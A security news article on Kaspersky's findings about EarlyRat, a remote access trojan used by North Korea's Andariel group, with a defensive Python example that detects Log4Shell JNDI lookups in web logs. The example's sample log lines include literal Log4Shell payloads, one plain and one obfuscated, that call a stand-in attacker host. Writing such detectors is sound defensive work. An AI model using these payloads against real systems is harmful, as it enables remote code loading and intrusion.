EarlyRat Malware Family
admin 1 year ago
admin #news

EarlyRat : Hidden Malware Family Exposed By North Korean Hackers

Kaspersky Lab researchers have uncovered a previously undocumented malware family and identified operational errors committed by Andariel, a faction of the North Korean Lazarus Group. Kaspersky Lab, in its report, analyzed the tactics of the Andariel group and identified a new threat called "EarlyRat".

The Andariel group is known for using DTrack malware and Maui ransomware. Andariel first gained attention in mid-2022. Using the Log4Shell vulnerability, Andariel delivered various families of malware to target devices, including YamaBot and MagicRat, as well as updated versions of NukeSped and DTrack.


An investigation by Kaspersky Lab showed that Andariel initiates the infection by executing a Log4Shell exploit that downloads additional malware from a command and control (C2) server.
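Because the intrusion described above starts with a Log4Shell exploit, the first place a defender can see it is in web-server or application logs. The following Python snippet is an added example written for this article, not code from Kaspersky Lab or from the report: it scans access-log lines for the JNDI lookup that Log4Shell relies on, first collapsing the nested `${lower:...}` / `${...:-...}` lookups that are commonly used to hide the plain `${jndi:` string from naive substring matching. The log lines, the IP addresses and the `attacker.example` host names are constructed for the example, and the function names are my own.

```python
import re

# Constructed sample access-log lines (not taken from the Kaspersky report).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"
10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET /?x=${${lower:j}ndi:rmi://attacker.example/b} HTTP/1.1" 404 0 "-" "curl/7.68.0"
10.0.0.7 - - [10/Dec/2021:12:00:04 +0000] "GET /search?q=jndi HTTP/1.1" 200 100 "-" "Mozilla/5.0"
"""

# Nested Log4j lookups that evaluate to a literal: ${lower:x}, ${upper:x}, ${anything:-x}.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")
# The lookup the exploit needs once the nesting has been resolved.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize_lookups(text: str) -> str:
    """Collapse nested lookups until nothing changes, so an obfuscated string
    reads the same as the plain form a simple pattern check expects.
    Every substitution shortens the string, so the loop always terminates."""
    previous = None
    while previous != text:
        previous = text
        text = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
    return text


def find_jndi_lookups(log_text: str) -> list[tuple[int, str]]:
    """Return (line number, client IP) for every log line that carries a JNDI
    lookup after normalization. A plain occurrence of the word 'jndi' (line 4
    of the sample) is not a lookup and is ignored."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        if _JNDI.search(normalize_lookups(line)):
            client_ip = line.split(" ", 1)[0]  # first field of the combined log format
            hits.append((number, client_ip))
    return hits


if __name__ == "__main__":
    for number, ip in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {number}: JNDI lookup from {ip}")
```

Run the file directly to see the two flagged lines (2 and 3); `normalize_lookups` can also be used on its own when you want to inspect what a suspicious string resolves to. In a real pipeline, URL-decode the request line and check request bodies and every logged header, not just the User-Agent, before applying the pattern.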


It is noteworthy that the researchers observed the execution of commands by a human operator and noted numerous errors and typos, suggesting that an inexperienced attacker was behind the operation.


The researchers also identified a new malware family called EarlyRat. Initially, it was assumed that EarlyRat samples were downloaded via Log4Shell, but further analysis showed that phishing documents were the main delivery mechanism for EarlyRat.


EarlyRat, like many other remote access trojans (RATs), collects system information upon activation and transmits it to the C2 server in a specific pattern. The transmitted data includes unique computer identifiers (IDs) and requests that are encrypted using the cryptographic keys specified in the ID field.


In terms of functionality, EarlyRat is simple, mostly limited to executing commands. Interestingly, EarlyRat shares some similarities with the Lazarus MagicRat malware: both are built on a framework (Qt for MagicRat and PureBasic for EarlyRat), and both RATs have limited functionality.


MagicRAT was first seen on victim networks using VMware Horizon servers connected to the internet. According to the researchers, the Trojan was created using the Qt framework to make analysis more difficult and less likely to be detected by security systems.


To gain a foothold in the system, the Trojan creates scheduled tasks. The functionality of MagicRat is quite simple: the malware provides attackers with a remote shell that allows them to execute arbitrary commands and manipulate the victim's files.
